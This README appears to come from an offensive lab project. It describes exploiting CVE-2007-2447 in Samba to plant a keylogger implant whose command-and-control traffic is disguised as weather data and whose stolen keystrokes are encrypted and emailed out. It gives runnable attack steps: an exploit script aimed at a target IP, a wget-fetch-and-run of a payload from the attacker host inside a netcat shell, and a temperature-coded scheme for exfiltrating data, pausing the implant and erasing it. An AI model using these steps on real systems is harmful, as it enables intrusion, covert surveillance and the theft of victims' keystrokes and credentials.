A cyber effect that exploits CVE-2007-2447, a vulnerability in the Samba server that allows remote code execution. The implant is injected into the victim machine using a weaponized exploit and gathers key log data. Command and control communication is disguised as weather data requested by the implant over HTTP, and the key log data is encrypted and sent by the implant over SMTPS.
An email address, preferably temporary, is needed so that the keylogger can send the key log data out of the victim machine.
- Linux-based machine with Python on it (Kali-Linux is recommended)
- Machine with Python on it to run the server script
-
Turn on all three devices (both attackers and victim). You don’t need to log into victim, but you do need to log into both Kali-Linux and Server.
-
In the Server, start the server script and record the public IP address it is running on. It is in this window where commands that control the implant are issued.
python3 server.py
-
In the Kali-Linux, copy all the bash script files and binary file into the same folder
> ls # should see only four files exploit.sh rewriteBoot.sh run.sh weather
-
Start the attack by:
chmod +x exploit.sh # give executable permission ./exploit.sh <Target IP> <Kali-Linux IP> # run exploit script
Give it a few seconds; if nothing shows up after typing the command, give it another try.
-
Inside the netcat shell:
wget http://<Kali-Linux IP>:8564/run.sh chmod +x run.sh ./run.sh <Kali-Linux IP> <Email Address> <Server IP>
Terminate the process after a few seconds. You need to type CTRL+C twice, once for NetCat and once for the HTTP server.
The implant is now running in the victim and we can control its behavior using the Server. By default, the Server sends weather data with a temperature of 50°F which instructs the keylogger to collect data. This attribute can be changed by entering a number in the window the server script is running in and pressing Enter.
input≤ 0°F encrypts the key log data and sends it in an email to the provided email address.- 0°F <
input≤ 32°F pauses the keylogger. - 32°F <
input≤ 70°F resumes the keylogger. input> 70°F stops the keylogger and removes the implant and all files related to it on the victim machine.
The message that is sent to the email address is encrypted using AES. To decrypt it and view the key log data, copy the contents into the keylog.txt file and then run the decrypt_email.py script, ensuring that they are in the same directory.
python3 decrypt_email.pyThe decrypted key log data will now be in keylog.txt.